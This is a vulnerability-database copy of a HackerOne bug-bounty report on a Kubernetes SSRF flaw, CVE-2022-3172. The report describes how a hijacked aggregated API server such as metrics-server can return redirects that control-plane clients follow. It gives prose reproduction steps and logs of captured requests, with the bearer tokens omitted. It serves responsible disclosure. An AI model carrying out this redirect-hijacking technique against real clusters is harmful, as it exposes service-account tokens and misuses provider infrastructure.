Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
hackeroneWeinongwH1:1544133
HistoryApr 19, 2022 - 1:33 a.m.

Kubernetes: SSRF vulnerability can be exploited when a hijacked aggregated api server such as metrics-server returns 30X

2022-04-1901:33:58
weinongw
hackerone.com
$1000
24
ssrf
vulnerability
kubernetes
metrics-server
hijacked
30x redirect
aks
cloud providers
traffic
bugbounty

EPSS

0.001

Percentile

28.1%

JSON

Report Submission Form

Summary:

This report uses metrics-server as example, but it should be applicable to any aggregated api server.

When metrics-server is hijacked, either by modifying the container image directly or by running another pods using the same label selector in kube-system namespace, and is returning 30X redirect, the clients calling the metrics api will follow the redirect.

It could be a serious issue in managed Kubernetes offerings such as Azure Kubernetes Service (AKS) where clients from managed components may be redirected to call the internal endpoints.

Note: my coworker, Nicolas Joly, found the issue and reported my team (AKS)

Kubernetes Version:

all k8s versions on AKS. I believe itโ€™s the same in other cloud providers.

Component Version:

n/a

Steps To Reproduce:

  • Attached main.go is a very simple redirection api server. Iโ€™ve built the docker image on weinong/go-redirect.
  • update and deploy go-redirect.yaml with your endpoint to capture the redirected traffic in kube-system namespace. It uses the same pod label selector as metrics-server does
  • you should be able to observe redirected traffic from the control plane components

Supporting Material/References:

Sample output being logged in the web server capturing redirected traffic:

2022/04/16 00:30:13 src IP: 20.51.80.40:4096
GET / HTTP/1.1
Host: 20.85.59.5
Accept: application/json, */*
Accept-Encoding: gzip
Authorization: Bearer <omitted>
User-Agent: azurepolicyaddon/v0.0.0 (linux/amd64) kubernetes/$Format

GET / HTTP/1.1
Host: 20.85.59.5
Accept: application/vnd.kubernetes.protobuf, */*
Authorization: Bearer <omitted>
User-Agent: kube-controller-manager/v1.17.13 (linux/amd64) kubernetes/f4a8e76/system:serviceaccount:kube-system:generic-garbage-collector

2022/04/16 00:34:37 src IP: 20.69.190.88:21504
GET / HTTP/1.1
Host: 20.85.59.5
Accept: application/json, */*
Accept-Encoding: gzip
Authorization: Bearer  <omitted>
User-Agent: cpmonitor/v0.0.0 (linux/amd64) kubernetes/$Format
  • [attachment / reference]

Impact

  • Bearer token may be logged in the logging system in those internal backend
  • Potentially, they may be logged by kube-controller-manager or kubernetes api-server at certain verbose level (not verified)
  • Redirected traffic may hit external/internal endpoints for spamming which would look originating from the cloud providers

Related

ibm 12
veracode 1
debiancve 1
nessus 11
prion 1
osv 1
cvelist 1
oraclelinux 4
ubuntucve 1
redhatcve 1
nvd 1
cve 1
githubexploit 1
altlinux 1
redhat 11
photon 2
ibm
ibm
Security Bulletin: Open Source Dependency Vulnerability
2023-05-15 18:55:21
Security Bulletin: IBM Robotic Process Automation for Cloud Pak may be vulnerable to server-side forgery requests due to Kubernetes kube-apiserver (CVE-2022-3172)
2022-10-25 19:54:07
Security Bulletin: Red Hat OpenShift on IBM Cloud is affected by a Kubernetes API server security vulnerability (CVE-2022-3172)
2023-05-24 13:34:23
veracode
veracode
Open Redirect
2023-01-31 00:45:56
debiancve
debiancve
CVE-2022-3172
2023-11-03 20:15:08
nessus
nessus
Oracle Linux 7 : kubernetes (ELSA-2022-9853)
2022-10-05 00:00:00
Oracle Linux 8 : kubernetes (ELSA-2022-9854)
2022-10-05 00:00:00
Oracle Linux 7 : kubernetes (ELSA-2022-9855)
2022-10-03 00:00:00
prion
prion
Design/Logic Flaw
2023-11-03 20:15:00
osv
osv
CVE-2022-3172
2023-11-03 20:15:08
cvelist
cvelist
CVE-2022-3172 Kubernetes - API server - Aggregated API server can cause clients to be redirected (SSRF)
2023-11-03 18:11:53
oraclelinux
oraclelinux
kubernetes security update
2022-10-05 00:00:00
kubernetes security update
2022-10-03 00:00:00
kubernetes security update
2022-10-05 00:00:00
ubuntucve
ubuntucve
CVE-2022-3172
2023-11-03 00:00:00
redhatcve
redhatcve
CVE-2022-3172
2022-09-19 05:43:26
nvd
nvd
CVE-2022-3172
2023-11-03 20:15:08
cve
cve
CVE-2022-3172
2023-11-03 20:15:08
githubexploit
githubexploit
Exploit for Server-Side Request Forgery in Kubernetes Apiserver
2024-04-02 11:53:54
altlinux
altlinux
Security fix for the ALT Linux 10 package kubernetes version 1.26.3-alt1
2023-03-29 00:00:00
redhat
redhat
(RHSA-2023:3609) Moderate: Red Hat OpenShift Data Foundation 4.12.4 security and Bug Fix update
2023-06-14 21:17:43
(RHSA-2023:1655) Critical: OpenShift Container Platform 4.10.56 security update
2023-04-12 11:51:14
(RHSA-2023:1656) Moderate: OpenShift Container Platform 4.10.56 security update
2023-04-12 11:40:20
photon
photon
Critical Photon OS Security Update - PHSA-2023-3.0-0631
2023-08-11 00:00:00
Critical Photon OS Security Update - PHSA-2023-4.0-0427
2023-07-14 00:00:00

EPSS

0.001

Percentile

28.1%

JSON
Related for H1:1544133
ibm12veracode1debiancve1nessus11prion1osv1cvelist1oraclelinux4ubuntucve1redhatcve1nvd1cve1githubexploit1altlinux1redhat11photon2